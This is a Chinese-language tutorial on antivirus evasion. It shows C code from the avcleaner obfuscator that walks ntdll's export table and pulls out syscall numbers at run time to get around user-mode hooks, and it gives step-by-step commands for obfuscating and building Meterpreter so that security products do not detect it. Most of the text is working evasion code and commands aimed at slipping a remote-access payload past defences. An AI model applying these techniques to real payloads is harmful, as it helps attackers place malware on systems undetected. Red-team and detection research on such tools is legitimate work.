免杀基础–免杀工具avcleaner(二)
—实战篇
0x00 介绍
avcleaner是一个针对C/C++源码 obfuscator。主要针对两个方面实现免杀功能:
- 字符串混淆传递
- API 导入隐藏/系统调用重写详细介绍请阅读 免杀基础–免杀工具avcleaner(一)
0x01 获取系统调用
为了实现对抗用户空间的hook,采用syscall的方式。作者并未采用现成的汇编形式,如采用SysWhisper2方式,而是代码中动态获取需要函数的调用号。这样可以减小代码的体积,减少特征。
1. 获取ntdll.dll的导出表
static PIMAGE_EXPORT_DIRECTORY get_export_dir(LPBYTE file_buffer, DWORD file_size, PIMAGE_SECTION_HEADER *first_section, DWORD* nb_sections) {
PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)file_buffer;
// sanitity check
if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) {
return;
}
PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(file_buffer + dos_header->e_lfanew);
*nb_sections = nt_header->FileHeader.NumberOfSections;
*first_section = (PIMAGE_SECTION_HEADER) (file_buffer + dos_header->e_lfanew +sizeof(IMAGE_NT_HEADERS));
DWORD export_rva = nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
// The field VirtualAddress needs a quick conversion in case the target is accessed in the file directly
DWORD export_file_offset = rva_to_file_offset(*first_section, *nb_sections, file_size, export_rva);
return (PIMAGE_EXPORT_DIRECTORY)(file_buffer + export_file_offset);
}
2. 遍历导出表获取导出函数名
PIMAGE_SECTION_HEADER first_section; // first section's header, points to an array of sections headers.
DWORD nb_sections = 0; // number of sections in ntdll
PIMAGE_EXPORT_DIRECTORY export_directory = get_export_dir(file_buffer, file_size, &first_section, &nb_sections);
PDWORD functions_address = (PDWORD)(file_buffer + rva_to_file_offset(first_section, nb_sections, file_size, export_directory->AddressOfFunctions));
PWORD ordinals_address = (PWORD)(file_buffer + rva_to_file_offset(first_section, nb_sections, file_size, export_directory->AddressOfNameOrdinals));
PDWORD names_address = (PDWORD)(file_buffer + rva_to_file_offset(first_section, nb_sections, file_size, export_directory->AddressOfNames));
SIZE_T nb_api_names = sizeof(__API_names) / sizeof(__API_names[0]);
syscall_infos = (syscall_info*)malloc(nb_api_names * sizeof(syscall_info));
for (DWORD i = 0; i < export_directory->NumberOfNames; ++i)
{
DWORD rva_api = functions_address[ordinals_address[i]];
DWORD file_offset_name = rva_to_file_offset(first_section, nb_sections, file_size, names_address[i]);
unsigned char* name = file_buffer + file_offset_name;
// filter everything except Zw* API functions
if (!(*name == 'Z' && *(name + 1) == 'w'))
continue;
3. 获取syscall的编号
windbg > u NtCreateFile
ntdll!NtCreateFile:
00007ffa`202458e0 4c8bd1 mov r10,rcx
00007ffa`202458e3 b855000000 mov eax,55h
00007ffa`202458e8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffa`202458f0 7503 jne ntdll!NtCreateFile+0x15 (00007ffa`202458f5)
00007ffa`202458f2 0f05 syscall
00007ffa`202458f4 c3 ret
00007ffa`202458f5 cd2e int 2Eh
00007ffa`202458f7 c3 ret
以上汇编代码中mov eax,55h
,给eax赋值的0x55就是NtCreateFile的syscall调用编号。编号相对于函数开头偏移4个字节,以此可以获取其它的函数的syscall调用编号并存于syscall_infos结构体数组中。
// get the syscall id
DWORD syscall_id = *(DWORD *)(procedure_address + SYSCALL_ID_OFFSET);
// compare with the APIs we're interested in
for (unsigned int i = 0; i < nb_api_names; i++) {
if (strequal(__API_names[i], (const char*)name)) {
syscall_infos[i].name = __API_names[i];
syscall_infos[i].id = syscall_id;
break;
}
}
0x02 实战 Meterpreter
得益于作者提供的docker环境,可使用docker快速搭建工具环境。
docker build . -t avcleaner
docker run -v [path to avcleaner]:/home/toto -it avcleaner bash
# 创建临时编译目录
export TMP_DIR=$(mktemp -d)
echo "Building in $TMP_DIR"
cd $TMP_DIR
# 从github下载meterpreter源码
git clone https://github.com/rapid7/metasploit-payloads
cd metasploit-payloads
git submodule update --init --recursive
针对meterpreter源码,可以简单使用*/.c | xargs avcleaner处理所有的c文件,当然也可以使用作者提供的脚本(avcleaner/scripts/obfuscate_meterpreter_macos.py)处理。
根据自己环境修改avcleaner/scripts/obfuscate_meterpreter_macos.py中的如下的路径变量。
AVCLEANER_PATH
PATCH_SYSCALL_PATH
WIN_INCLUDE
CLANG_PATH
接着执行:
cd c/meterpreter
# 通过python3脚本运行我们的混淆工具
python3 avcleaner/scripts/obfuscate_meterpreter_macos.py -p "$TMP_DIR/c/meterpreter/source" --edit --api --strings
make docker-x64
0x03 演示
0x04 参考
作者为这个项目编写的blog